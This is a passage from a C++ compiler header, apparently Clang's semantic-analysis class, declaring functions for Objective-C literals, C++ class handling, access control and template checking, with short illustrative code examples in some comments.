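// rejects the candidate and DiagnoseUnsatisfiedConstraint explains which
// requirement failed:
//
//   template <typename T>
//   concept Addable = requires(T a, T b) { a + b; };
//   template <Addable T> constexpr T twice(T v) { return v + v; }
//   static_assert(twice(2) == 4);   // satisfied for int
//   // twice(nullptr) would be ill-formed: Addable<std::nullptr_t> is false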
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
void
DiagnoseUnsatisfiedConstraint(const ConstraintSatisfaction& Satisfaction);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
void
DiagnoseUnsatisfiedConstraint(const ASTConstraintSatisfaction& Satisfaction);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied because it was ill-formed.
void DiagnoseUnsatisfiedIllFormedConstraint(SourceLocation DiagnosticLocation,
StringRef Diagnostic);
void
DiagnoseRedeclarationConstraintMismatch(const TemplateParameterList *Old,
const TemplateParameterList *New);
// ParseObjCStringLiteral - Parse Objective-C string literals.
ExprResult ParseObjCStringLiteral(SourceLocation *AtLocs,
ArrayRef<Expr *> Strings);
ExprResult BuildObjCStringLiteral(SourceLocation AtLoc, StringLiteral *S);
/// BuildObjCNumericLiteral - builds an ObjCBoxedExpr AST node for the
/// numeric literal expression. The type of the expression will be "NSNumber *"
/// or "id" if NSNumber is unavailable.
ExprResult BuildObjCNumericLiteral(SourceLocation AtLoc, Expr *Number);
ExprResult ActOnObjCBoolLiteral(SourceLocation AtLoc, SourceLocation ValueLoc,
bool Value);
ExprResult BuildObjCArrayLiteral(SourceRange SR, MultiExprArg Elements);
/// BuildObjCBoxedExpr - builds an ObjCBoxedExpr AST node for the
/// '@' prefixed parenthesized expression. The type of the expression will
/// either be "NSNumber *", "NSString *" or "NSValue *" depending on the type
/// of ValueType, which is allowed to be a built-in numeric type, "char *",
/// "const char *" or C structure with attribute 'objc_boxable'.
ExprResult BuildObjCBoxedExpr(SourceRange SR, Expr *ValueExpr);
ExprResult BuildObjCSubscriptExpression(SourceLocation RB, Expr *BaseExpr,
Expr *IndexExpr,
ObjCMethodDecl *getterMethod,
ObjCMethodDecl *setterMethod);
ExprResult BuildObjCDictionaryLiteral(SourceRange SR,
MutableArrayRef<ObjCDictionaryElement> Elements);
ExprResult BuildObjCEncodeExpression(SourceLocation AtLoc,
TypeSourceInfo *EncodedTypeInfo,
SourceLocation RParenLoc);
ExprResult BuildCXXMemberCallExpr(Expr *Exp, NamedDecl *FoundDecl,
CXXConversionDecl *Method,
bool HadMultipleCandidates);
ExprResult ParseObjCEncodeExpression(SourceLocation AtLoc,
SourceLocation EncodeLoc,
SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc);
/// ParseObjCSelectorExpression - Build selector expression for \@selector
ExprResult ParseObjCSelectorExpression(Selector Sel,
SourceLocation AtLoc,
SourceLocation SelLoc,
SourceLocation LParenLoc,
SourceLocation RParenLoc,
bool WarnMultipleSelectors);
/// ParseObjCProtocolExpression - Build protocol expression for \@protocol
ExprResult ParseObjCProtocolExpression(IdentifierInfo * ProtocolName,
SourceLocation AtLoc,
SourceLocation ProtoLoc,
SourceLocation LParenLoc,
SourceLocation ProtoIdLoc,
SourceLocation RParenLoc);
//===--------------------------------------------------------------------===//
// C++ Declarations
//
Decl *ActOnStartLinkageSpecification(Scope *S,
SourceLocation ExternLoc,
Expr *LangStr,
SourceLocation LBraceLoc);
Decl *ActOnFinishLinkageSpecification(Scope *S,
Decl *LinkageSpec,
SourceLocation RBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Classes
//
CXXRecordDecl *getCurrentClass(Scope *S, const CXXScopeSpec *SS);
bool isCurrentClassName(const IdentifierInfo &II, Scope *S,
const CXXScopeSpec *SS = nullptr);
bool isCurrentClassNameTypo(IdentifierInfo *&II, const CXXScopeSpec *SS);
bool ActOnAccessSpecifier(AccessSpecifier Access, SourceLocation ASLoc,
SourceLocation ColonLoc,
const ParsedAttributesView &Attrs);
NamedDecl *ActOnCXXMemberDeclarator(Scope *S, AccessSpecifier AS,
Declarator &D,
MultiTemplateParamsArg TemplateParameterLists,
Expr *BitfieldWidth, const VirtSpecifiers &VS,
InClassInitStyle InitStyle);
void ActOnStartCXXInClassMemberInitializer();
void ActOnFinishCXXInClassMemberInitializer(Decl *VarDecl,
SourceLocation EqualLoc,
Expr *Init);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
SourceLocation LParenLoc,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
SourceLocation EllipsisLoc);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *InitList,
SourceLocation EllipsisLoc);
MemInitResult BuildMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *Init,
SourceLocation EllipsisLoc);
MemInitResult BuildMemberInitializer(ValueDecl *Member,
Expr *Init,
SourceLocation IdLoc);
MemInitResult BuildBaseInitializer(QualType BaseType,
TypeSourceInfo *BaseTInfo,
Expr *Init,
CXXRecordDecl *ClassDecl,
SourceLocation EllipsisLoc);
MemInitResult BuildDelegatingInitializer(TypeSourceInfo *TInfo,
Expr *Init,
CXXRecordDecl *ClassDecl);
bool SetDelegatingInitializer(CXXConstructorDecl *Constructor,
CXXCtorInitializer *Initializer);
bool SetCtorInitializers(CXXConstructorDecl *Constructor, bool AnyErrors,
ArrayRef<CXXCtorInitializer *> Initializers = None);
void SetIvarInitializers(ObjCImplementationDecl *ObjCImplementation);
/// MarkBaseAndMemberDestructorsReferenced - Given a record decl,
/// mark all the non-trivial destructors of its members and bases as
/// referenced.
void MarkBaseAndMemberDestructorsReferenced(SourceLocation Loc,
CXXRecordDecl *Record);
/// The list of classes whose vtables have been used within
/// this translation unit, and the source locations at which the
/// first use occurred.
typedef std::pair<CXXRecordDecl*, SourceLocation> VTableUse;
/// The list of vtables that are required but have not yet been
/// materialized.
SmallVector<VTableUse, 16> VTableUses;
/// The set of classes whose vtables have been used within
/// this translation unit, and a bit that will be true if the vtable is
/// required to be emitted (otherwise, it should be emitted only if needed
/// by code generation).
llvm::DenseMap<CXXRecordDecl *, bool> VTablesUsed;
/// Load any externally-stored vtable uses.
void LoadExternalVTableUses();
/// Note that the vtable for the given class was used at the
/// given location.
void MarkVTableUsed(SourceLocation Loc, CXXRecordDecl *Class,
bool DefinitionRequired = false);
/// Mark the exception specifications of all virtual member functions
/// in the given class as needed.
void MarkVirtualMemberExceptionSpecsNeeded(SourceLocation Loc,
const CXXRecordDecl *RD);
/// MarkVirtualMembersReferenced - Will mark all members of the given
/// CXXRecordDecl referenced.
void MarkVirtualMembersReferenced(SourceLocation Loc, const CXXRecordDecl *RD,
bool ConstexprOnly = false);
/// Define all of the vtables that have been used in this
/// translation unit and reference any virtual members used by those
/// vtables.
///
/// \returns true if any work was done, false otherwise.
bool DefineUsedVTables();
void AddImplicitlyDeclaredMembersToClass(CXXRecordDecl *ClassDecl);
void ActOnMemInitializers(Decl *ConstructorDecl,
SourceLocation ColonLoc,
ArrayRef<CXXCtorInitializer*> MemInits,
bool AnyErrors);
/// Check class-level dllimport/dllexport attribute. The caller must
/// ensure that referenceDLLExportedClassMethods is called some point later
/// when all outer classes of Class are complete.
void checkClassLevelDLLAttribute(CXXRecordDecl *Class);
void checkClassLevelCodeSegAttribute(CXXRecordDecl *Class);
void referenceDLLExportedClassMethods();
void propagateDLLAttrToBaseClassTemplate(
CXXRecordDecl *Class, Attr *ClassAttr,
ClassTemplateSpecializationDecl *BaseTemplateSpec,
SourceLocation BaseLoc);
/// Add gsl::Pointer attribute to std::container::iterator
/// \param ND The declaration that introduces the name
/// std::container::iterator.
/// \param UnderlyingRecord The record named by ND.
void inferGslPointerAttribute(NamedDecl *ND, CXXRecordDecl *UnderlyingRecord);
/// Add [[gsl::Owner]] and [[gsl::Pointer]] attributes for std:: types.
void inferGslOwnerPointerAttribute(CXXRecordDecl *Record);
/// Add [[gsl::Pointer]] attributes for std:: types.
void inferGslPointerAttribute(TypedefNameDecl *TD);
void CheckCompletedCXXClass(Scope *S, CXXRecordDecl *Record);
/// Check that the C++ class annotated with "trivial_abi" satisfies all the
/// conditions that are needed for the attribute to have an effect.
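/// An illustrative use of the attribute:
/// \code
/// struct [[clang::trivial_abi]] Handle {
///   ~Handle();
///   int fd;
/// };
/// \endcode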
void checkIllFormedTrivialABIStruct(CXXRecordDecl &RD);
void ActOnFinishCXXMemberSpecification(Scope *S, SourceLocation RLoc,
Decl *TagDecl, SourceLocation LBrac,
SourceLocation RBrac,
const ParsedAttributesView &AttrList);
void ActOnFinishCXXMemberDecls();
void ActOnFinishCXXNonNestedClass();
void ActOnReenterCXXMethodParameter(Scope *S, ParmVarDecl *Param);
unsigned ActOnReenterTemplateScope(Scope *S, Decl *Template);
void ActOnStartDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnStartDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnDelayedCXXMethodParameter(Scope *S, Decl *Param);
void ActOnFinishDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnFinishDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnFinishDelayedMemberInitializers(Decl *Record);
void MarkAsLateParsedTemplate(FunctionDecl *FD, Decl *FnD,
CachedTokens &Toks);
void UnmarkAsLateParsedTemplate(FunctionDecl *FD);
bool IsInsideALocalClassWithinATemplateFunction();
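/// (Illustrative) Handles declarations such as:
/// \code
/// static_assert(sizeof(void *) >= 4, "unexpected pointer size");
/// \endcode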
Decl *ActOnStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
Expr *AssertMessageExpr,
SourceLocation RParenLoc);
Decl *BuildStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
StringLiteral *AssertMessageExpr,
SourceLocation RParenLoc,
bool Failed);
FriendDecl *CheckFriendTypeDecl(SourceLocation LocStart,
SourceLocation FriendLoc,
TypeSourceInfo *TSInfo);
Decl *ActOnFriendTypeDecl(Scope *S, const DeclSpec &DS,
MultiTemplateParamsArg TemplateParams);
NamedDecl *ActOnFriendFunctionDecl(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParams);
QualType CheckConstructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
void CheckConstructor(CXXConstructorDecl *Constructor);
QualType CheckDestructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
bool CheckDestructor(CXXDestructorDecl *Destructor);
void CheckConversionDeclarator(Declarator &D, QualType &R,
StorageClass& SC);
Decl *ActOnConversionDeclarator(CXXConversionDecl *Conversion);
void CheckDeductionGuideDeclarator(Declarator &D, QualType &R,
StorageClass &SC);
void CheckDeductionGuideTemplate(FunctionTemplateDecl *TD);
void CheckExplicitlyDefaultedFunction(Scope *S, FunctionDecl *MD);
bool CheckExplicitlyDefaultedSpecialMember(CXXMethodDecl *MD,
CXXSpecialMember CSM);
void CheckDelayedMemberExceptionSpecs();
bool CheckExplicitlyDefaultedComparison(Scope *S, FunctionDecl *MD,
DefaultedComparisonKind DCK);
void DeclareImplicitEqualityComparison(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
void DefineDefaultedComparison(SourceLocation Loc, FunctionDecl *FD,
DefaultedComparisonKind DCK);
//===--------------------------------------------------------------------===//
// C++ Derived Classes
//
/// ActOnBaseSpecifier - Parsed a base specifier
CXXBaseSpecifier *CheckBaseSpecifier(CXXRecordDecl *Class,
SourceRange SpecifierRange,
bool Virtual, AccessSpecifier Access,
TypeSourceInfo *TInfo,
SourceLocation EllipsisLoc);
BaseResult ActOnBaseSpecifier(Decl *classdecl,
SourceRange SpecifierRange,
ParsedAttributes &Attrs,
bool Virtual, AccessSpecifier Access,
ParsedType basetype,
SourceLocation BaseLoc,
SourceLocation EllipsisLoc);
bool AttachBaseSpecifiers(CXXRecordDecl *Class,
MutableArrayRef<CXXBaseSpecifier *> Bases);
void ActOnBaseSpecifiers(Decl *ClassDecl,
MutableArrayRef<CXXBaseSpecifier *> Bases);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base,
CXXBasePaths &Paths);
// FIXME: I don't like this name.
void BuildBasePathArray(const CXXBasePaths &Paths, CXXCastPath &BasePath);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
SourceLocation Loc, SourceRange Range,
CXXCastPath *BasePath = nullptr,
bool IgnoreAccess = false);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
unsigned InaccessibleBaseID,
unsigned AmbigiousBaseConvID,
SourceLocation Loc, SourceRange Range,
DeclarationName Name,
CXXCastPath *BasePath,
bool IgnoreAccess = false);
std::string getAmbiguousPathsDisplayString(CXXBasePaths &Paths);
bool CheckOverridingFunctionAttributes(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionReturnType - Checks whether the return types are
/// covariant, according to C++ [class.virtual]p5.
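/// A minimal covariance example (illustrative):
/// \code
/// struct Base { virtual Base *clone(); };
/// struct Derived : Base { Derived *clone() override; }; // covariant
/// \endcode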
bool CheckOverridingFunctionReturnType(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionExceptionSpec - Checks whether the exception
/// spec is a subset of base spec.
bool CheckOverridingFunctionExceptionSpec(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
bool CheckPureMethod(CXXMethodDecl *Method, SourceRange InitRange);
/// CheckOverrideControl - Check C++11 override control semantics.
void CheckOverrideControl(NamedDecl *D);
/// DiagnoseAbsenceOfOverrideControl - Diagnose if 'override' keyword was
/// not used in the declaration of an overriding method.
void DiagnoseAbsenceOfOverrideControl(NamedDecl *D);
/// CheckForFunctionMarkedFinal - Checks whether a virtual member function
/// overrides a virtual member function marked 'final', according to
/// C++11 [class.virtual]p4.
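/// Illustrative example of the error this detects:
/// \code
/// struct B { virtual void f() final; };
/// struct D : B { void f() override; }; // error: 'f' is marked 'final'
/// \endcode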
bool CheckIfOverriddenFunctionIsMarkedFinal(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
//===--------------------------------------------------------------------===//
// C++ Access Control
//
enum AccessResult {
AR_accessible,
AR_inaccessible,
AR_dependent,
AR_delayed
};
bool SetMemberAccessSpecifier(NamedDecl *MemberDecl,
NamedDecl *PrevMemberDecl,
AccessSpecifier LexicalAS);
AccessResult CheckUnresolvedMemberAccess(UnresolvedMemberExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckUnresolvedLookupAccess(UnresolvedLookupExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckAllocationAccess(SourceLocation OperatorLoc,
SourceRange PlacementRange,
CXXRecordDecl *NamingClass,
DeclAccessPair FoundDecl,
bool Diagnose = true);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
bool IsCopyBindingRefToTemp = false);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
const PartialDiagnostic &PDiag);
AccessResult CheckDestructorAccess(SourceLocation Loc,
CXXDestructorDecl *Dtor,
const PartialDiagnostic &PDiag,
QualType objectType = QualType());
AccessResult CheckFriendAccess(NamedDecl *D);
AccessResult CheckMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *NamingClass,
DeclAccessPair Found);
AccessResult
CheckStructuredBindingMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *DecomposedClass,
DeclAccessPair Field);
AccessResult CheckMemberOperatorAccess(SourceLocation Loc,
Expr *ObjectExpr,
Expr *ArgExpr,
DeclAccessPair FoundDecl);
AccessResult CheckAddressOfMemberAccess(Expr *OvlExpr,
DeclAccessPair FoundDecl);
AccessResult CheckBaseClassAccess(SourceLocation AccessLoc,
QualType Base, QualType Derived,
const CXXBasePath &Path,
unsigned DiagID,
bool ForceCheck = false,
bool ForceUnprivileged = false);
void CheckLookupAccess(const LookupResult &R);
bool IsSimplyAccessible(NamedDecl *Decl, CXXRecordDecl *NamingClass,
QualType BaseType);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found, QualType ObjectType,
SourceLocation Loc,
const PartialDiagnostic &Diag);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found,
QualType ObjectType) {
return isMemberAccessibleForDeletion(NamingClass, Found, ObjectType,
SourceLocation(), PDiag());
}
void HandleDependentAccessCheck(const DependentDiagnostic &DD,
const MultiLevelTemplateArgumentList &TemplateArgs);
void PerformDependentDiagnostics(const DeclContext *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
void HandleDelayedAccessCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
/// When true, access checking violations are treated as SFINAE
/// failures rather than hard errors.
bool AccessCheckingSFINAE;
enum AbstractDiagSelID {
AbstractNone = -1,
AbstractReturnType,
AbstractParamType,
AbstractVariableType,
AbstractFieldType,
AbstractIvarType,
AbstractSynthesizedIvarType,
AbstractArrayType
};
bool isAbstractType(SourceLocation Loc, QualType T);
bool RequireNonAbstractType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
template <typename... Ts>
bool RequireNonAbstractType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireNonAbstractType(Loc, T, Diagnoser);
}
void DiagnoseAbstractType(const CXXRecordDecl *RD);
//===--------------------------------------------------------------------===//
// C++ Overloaded Operators [C++ 13.5]
//
bool CheckOverloadedOperatorDeclaration(FunctionDecl *FnDecl);
bool CheckLiteralOperatorDeclaration(FunctionDecl *FnDecl);
//===--------------------------------------------------------------------===//
// C++ Templates [C++ 14]
//
void FilterAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
bool hasAnyAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true,
bool AllowNonTemplateFunctions = false);
/// Try to interpret the lookup result D as a template-name.
///
/// \param D A declaration found by name lookup.
/// \param AllowFunctionTemplates Whether function templates should be
/// considered valid results.
/// \param AllowDependent Whether unresolved using declarations (that might
/// name templates) should be considered valid results.
NamedDecl *getAsTemplateNameDecl(NamedDecl *D,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
enum class AssumedTemplateKind {
/// This is not assumed to be a template name.
None,
/// This is assumed to be a template name because lookup found nothing.
FoundNothing,
/// This is assumed to be a template name because lookup found one or more
/// functions (but no function templates).
FoundFunctions,
};
bool LookupTemplateName(LookupResult &R, Scope *S, CXXScopeSpec &SS,
QualType ObjectType, bool EnteringContext,
bool &MemberOfUnknownSpecialization,
SourceLocation TemplateKWLoc = SourceLocation(),
AssumedTemplateKind *ATK = nullptr);
TemplateNameKind isTemplateName(Scope *S,
CXXScopeSpec &SS,
bool hasTemplateKeyword,
const UnqualifiedId &Name,
ParsedType ObjectType,
bool EnteringContext,
TemplateTy &Template,
bool &MemberOfUnknownSpecialization);
/// Try to resolve an undeclared template name as a type template.
///
/// Sets II to the identifier corresponding to the template name, and updates
/// Name to a corresponding (typo-corrected) type template name and TNK to
/// the corresponding kind, if possible.
void ActOnUndeclaredTypeTemplateName(Scope *S, TemplateTy &Name,
TemplateNameKind &TNK,
SourceLocation NameLoc,
IdentifierInfo *&II);
bool resolveAssumedTemplateNameAsType(Scope *S, TemplateName &Name,
SourceLocation NameLoc,
bool Diagnose = true);
/// Determine whether a particular identifier might be the name in a C++1z
/// deduction-guide declaration.
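/// For example (illustrative; 'Box' is a placeholder):
/// \code
/// template<typename T> struct Box { Box(T); };
/// Box(const char *) -> Box<std::string>; // 'Box' names a deduction guide
/// \endcode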
bool isDeductionGuideName(Scope *S, const IdentifierInfo &Name,
SourceLocation NameLoc,
ParsedTemplateTy *Template = nullptr);
bool DiagnoseUnknownTemplateName(const IdentifierInfo &II,
SourceLocation IILoc,
Scope *S,
const CXXScopeSpec *SS,
TemplateTy &SuggestedTemplate,
TemplateNameKind &SuggestedKind);
bool DiagnoseUninstantiableTemplate(SourceLocation PointOfInstantiation,
NamedDecl *Instantiation,
bool InstantiatedFromMember,
const NamedDecl *Pattern,
const NamedDecl *PatternDef,
TemplateSpecializationKind TSK,
bool Complain = true);
void DiagnoseTemplateParameterShadow(SourceLocation Loc, Decl *PrevDecl);
TemplateDecl *AdjustDeclIfTemplate(Decl *&Decl);
NamedDecl *ActOnTypeParameter(Scope *S, bool Typename,
SourceLocation EllipsisLoc,
SourceLocation KeyLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth, unsigned Position,
SourceLocation EqualLoc,
ParsedType DefaultArg);
QualType CheckNonTypeTemplateParameterType(TypeSourceInfo *&TSI,
SourceLocation Loc);
QualType CheckNonTypeTemplateParameterType(QualType T, SourceLocation Loc);
NamedDecl *ActOnNonTypeTemplateParameter(Scope *S, Declarator &D,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
Expr *DefaultArg);
NamedDecl *ActOnTemplateTemplateParameter(Scope *S,
SourceLocation TmpLoc,
TemplateParameterList *Params,
SourceLocation EllipsisLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
ParsedTemplateArgument DefaultArg);
TemplateParameterList *
ActOnTemplateParameterList(unsigned Depth,
SourceLocation ExportLoc,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> Params,
SourceLocation RAngleLoc,
Expr *RequiresClause);
/// The context in which we are checking a template parameter list.
enum TemplateParamListContext {
TPC_ClassTemplate,
TPC_VarTemplate,
TPC_FunctionTemplate,
TPC_ClassTemplateMember,
TPC_FriendClassTemplate,
TPC_FriendFunctionTemplate,
TPC_FriendFunctionTemplateDefinition,
TPC_TypeAliasTemplate
};
bool CheckTemplateParameterList(TemplateParameterList *NewParams,
TemplateParameterList *OldParams,
TemplateParamListContext TPC,
SkipBodyInfo *SkipBody = nullptr);
TemplateParameterList *MatchTemplateParametersToScopeSpecifier(
SourceLocation DeclStartLoc, SourceLocation DeclLoc,
const CXXScopeSpec &SS, TemplateIdAnnotation *TemplateId,
ArrayRef<TemplateParameterList *> ParamLists,
bool IsFriend, bool &IsMemberSpecialization, bool &Invalid);
DeclResult CheckClassTemplate(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name, SourceLocation NameLoc,
const ParsedAttributesView &Attr, TemplateParameterList *TemplateParams,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
SourceLocation FriendLoc, unsigned NumOuterTemplateParamLists,
TemplateParameterList **OuterTemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
TemplateArgumentLoc getTrivialTemplateArgumentLoc(const TemplateArgument &Arg,
QualType NTTPType,
SourceLocation Loc);
/// Get a template argument mapping the given template parameter to itself,
/// e.g. for X in \c template<int X>, this would return an expression template
/// argument referencing X.
TemplateArgumentLoc getIdentityTemplateArgumentLoc(Decl *Param,
SourceLocation Location);
void translateTemplateArguments(const ASTTemplateArgsPtr &In,
TemplateArgumentListInfo &Out);
ParsedTemplateArgument ActOnTemplateTypeArgument(TypeResult ParsedType);
void NoteAllFoundTemplates(TemplateName Name);
QualType CheckTemplateIdType(TemplateName Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs);
TypeResult
ActOnTemplateIdType(Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
TemplateTy Template, IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc, SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs, SourceLocation RAngleLoc,
bool IsCtorOrDtorName = false, bool IsClassName = false);
/// Parsed an elaborated-type-specifier that refers to a template-id,
/// such as \c class T::template apply<U>.
TypeResult ActOnTagTemplateIdType(TagUseKind TUK,
TypeSpecifierType TagSpec,
SourceLocation TagLoc,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateD,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgsIn,
SourceLocation RAngleLoc);
DeclResult ActOnVarTemplateSpecialization(
Scope *S, Declarator &D, TypeSourceInfo *DI,
SourceLocation TemplateKWLoc, TemplateParameterList *TemplateParams,
StorageClass SC, bool IsPartialSpecialization);
DeclResult CheckVarTemplateId(VarTemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation TemplateNameLoc,
const TemplateArgumentListInfo &TemplateArgs);
ExprResult CheckVarTemplateId(const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
VarTemplateDecl *Template,
SourceLocation TemplateLoc,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult
CheckConceptTemplateId(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
SourceLocation ConceptNameLoc, NamedDecl *FoundDecl,
ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs);
void diagnoseMissingTemplateArguments(TemplateName Name, SourceLocation Loc);
ExprResult BuildTemplateIdExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
bool RequiresADL,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildQualifiedTemplateIdExpr(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
TemplateNameKind ActOnDependentTemplateName(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
const UnqualifiedId &Name, ParsedType ObjectType, bool EnteringContext,
TemplateTy &Template, bool AllowInjectedClassName = false);
DeclResult ActOnClassTemplateSpecialization(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
SourceLocation ModulePrivateLoc, TemplateIdAnnotation &TemplateId,
const ParsedAttributesView &Attr,
MultiTemplateParamsArg TemplateParameterLists,
SkipBodyInfo *SkipBody = nullptr);
bool CheckTemplatePartialSpecializationArgs(SourceLocation Loc,
TemplateDecl *PrimaryTemplate,
unsigned NumExplicitArgs,
ArrayRef<TemplateArgument> Args);
void CheckTemplatePartialSpecialization(
ClassTemplatePartialSpecializationDecl *Partial);
void CheckTemplatePartialSpecialization(
VarTemplatePartialSpecializationDecl *Partial);
Decl *ActOnTemplateDeclarator(Scope *S,
MultiTemplateParamsArg TemplateParameterLists,
Declarator &D);
bool
CheckSpecializationInstantiationRedecl(SourceLocation NewLoc,
TemplateSpecializationKind NewTSK,
NamedDecl *PrevDecl,
TemplateSpecializationKind PrevTSK,
SourceLocation PrevPtOfInstantiation,
bool &SuppressNew);
bool CheckDependentFunctionTemplateSpecialization(FunctionDecl *FD,
const TemplateArgumentListInfo &ExplicitTemplateArgs,
LookupResult &Previous);
bool CheckFunctionTemplateSpecialization(
FunctionDecl *FD, TemplateArgumentListInfo *ExplicitTemplateArgs,
LookupResult &Previous, bool QualifiedFriend = false);
bool CheckMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
void CompleteMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
DeclResult ActOnExplicitInstantiation(
Scope *S, SourceLocation ExternLoc, SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc, const CXXScopeSpec &SS,
TemplateTy Template, SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc, ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc, const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S, SourceLocation ExternLoc,
SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S,
SourceLocation ExternLoc,
SourceLocation TemplateLoc,
Declarator &D);
TemplateArgumentLoc
SubstDefaultTemplateArgumentIfAvailable(TemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
Decl *Param,
SmallVectorImpl<TemplateArgument>
&Converted,
bool &HasDefaultArg);
/// Specifies the context in which a particular template
/// argument is being checked.
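/// An illustrative contrast between the kinds:
/// \code
/// template<int N> struct A {};
/// A<5> a;                        // 5 is CTAK_Specified
/// template<typename T> void f(T);
/// void g() { f(42); }            // T = int is CTAK_Deduced
/// \endcode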
enum CheckTemplateArgumentKind {
/// The template argument was specified in the code or was
/// instantiated with some deduced template arguments.
CTAK_Specified,
/// The template argument was deduced via template argument
/// deduction.
CTAK_Deduced,
/// The template argument was deduced from an array bound
/// via template argument deduction.
CTAK_DeducedFromArrayBound
};
bool CheckTemplateArgument(NamedDecl *Param,
TemplateArgumentLoc &Arg,
NamedDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
unsigned ArgumentPackIndex,
SmallVectorImpl<TemplateArgument> &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
/// Check that the given template arguments can be provided to
/// the given template, converting the arguments along the way.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateLoc The location of the template name in the source.
///
/// \param TemplateArgs The list of template arguments. If the template is
/// a template template parameter, this function may extend the set of
/// template arguments to also include substituted, defaulted template
/// arguments.
///
